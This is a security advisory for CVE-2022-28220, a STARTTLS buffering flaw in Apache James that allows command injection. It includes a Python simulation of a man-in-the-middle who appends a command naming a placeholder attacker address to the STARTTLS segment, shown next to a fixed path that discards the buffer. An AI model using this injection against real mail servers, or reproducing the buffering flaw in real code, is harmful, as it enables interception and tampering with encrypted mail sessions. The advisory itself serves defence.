PT-2022-18884 · Apache · Apache James
Benoit Tellier · Published 2022-09-08 · Updated 2022-09-30 · CVE-2022-28220
CVSS v3.1 7.5 High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Name of the Vulnerable Software and Affected Versions
Apache James versions prior to 3.6.3
Apache James versions prior to 3.7.1
Description
The issue is a buffering attack relying on the STARTTLS command. Plaintext bytes that arrive in the same network read as STARTTLS are kept in the server's command buffer and processed after the TLS handshake, so a man-in-the-middle who appends a command to the client's STARTTLS gets that command executed inside the encrypted session (command injection). It is similar to a problem previously fixed in Apache James 3.6.1, but that fix does not account for concurrent requests and is subject to a parser differential.
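The following simulation is an added example and is not Apache James code. It models a minimal SMTP-style command loop with a switch for the buffering flaw: `run_session` either replays bytes that trailed STARTTLS inside the TLS session (vulnerable) or discards the whole buffer at the handshake (fixed). The traffic, the attacker's `mitm_inject` helper and the injected `RCPT TO` line are constructed for the demonstration; the TLS handshake itself is represented only by the `inside_tls` flag, and segments after it stand for decrypted TLS records.

```python
# Added example (not Apache James code): why a plaintext command buffered
# alongside STARTTLS ends up executing inside the TLS session, and how
# discarding the buffer at the handshake closes the hole.

def mitm_inject(client_segment: bytes, injected: bytes) -> bytes:
    """Model the network attacker: append a plaintext command to the TCP
    segment carrying the client's STARTTLS. The client never sent it, but
    the server receives both in a single read (assumed attacker capability)."""
    return client_segment + injected


def run_session(segments, discard_after_starttls: bool):
    """Feed byte segments to a minimal SMTP-like command loop.

    Returns a list of (command, inside_tls) tuples recording every command
    the server executed and whether it ran inside the TLS session."""
    buf = b""
    inside_tls = False
    executed = []
    for seg in segments:
        buf += seg
        while True:
            # Accept CRLF and bare LF, so the line framing used here cannot
            # disagree with the STARTTLS check below (no parser differential).
            idx = buf.find(b"\n")
            if idx < 0:
                break
            line, buf = buf[:idx], buf[idx + 1:]
            cmd = line.rstrip(b"\r").decode("ascii", "replace")
            verb = cmd.split(" ", 1)[0].upper()
            if verb == "STARTTLS" and not inside_tls:
                executed.append((cmd, False))
                # The TLS handshake would happen here. Anything still in buf
                # arrived in plaintext next to STARTTLS and must be dropped;
                # keeping it is the flaw this example demonstrates.
                if discard_after_starttls:
                    buf = b""
                inside_tls = True
                continue
            executed.append((cmd, inside_tls))
    return executed


# Constructed traffic: the client sends EHLO, then STARTTLS; the attacker
# splices a command onto the STARTTLS segment; after the handshake the
# client sends MAIL FROM over TLS.
CLIENT_PLAINTEXT = [b"EHLO client.example\r\n", b"STARTTLS\r\n"]
INJECTED = b"RCPT TO:<attacker@evil.example>\r\n"
OVER_TLS = [b"MAIL FROM:<alice@example.com>\r\n"]


def demo(discard_after_starttls: bool):
    """Run the constructed session through the vulnerable or fixed loop."""
    on_the_wire = CLIENT_PLAINTEXT[:-1] + [mitm_inject(CLIENT_PLAINTEXT[-1], INJECTED)]
    return run_session(on_the_wire + OVER_TLS, discard_after_starttls)


def injected_inside_tls(executed):
    """Commands from the attacker that the server ran inside the TLS session."""
    return [cmd for cmd, inside in executed if inside and cmd.encode() == INJECTED.strip()]


if __name__ == "__main__":
    for label, flag in (("vulnerable", False), ("fixed", True)):
        print(label, demo(flag), "injected:", injected_inside_tls(demo(flag)))
```

The fixed path throws away the buffer without inspecting it, which is the property to test for on a real deployment: send `STARTTLS\r\n` followed by a harmless command in the same write, complete the handshake, and confirm the server never answers the trailing command.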
Recommendations
For Apache James versions prior to 3.6.3, update to version 3.6.3 or later.
For Apache James versions prior to 3.7.1, update to version 3.7.1 or later.
Fix
Update to Apache James 3.6.3 or 3.7.1.
Weakness Enumeration
Command Injection
Related Identifiers
CVE-2022-28220
Affected Products
Apache James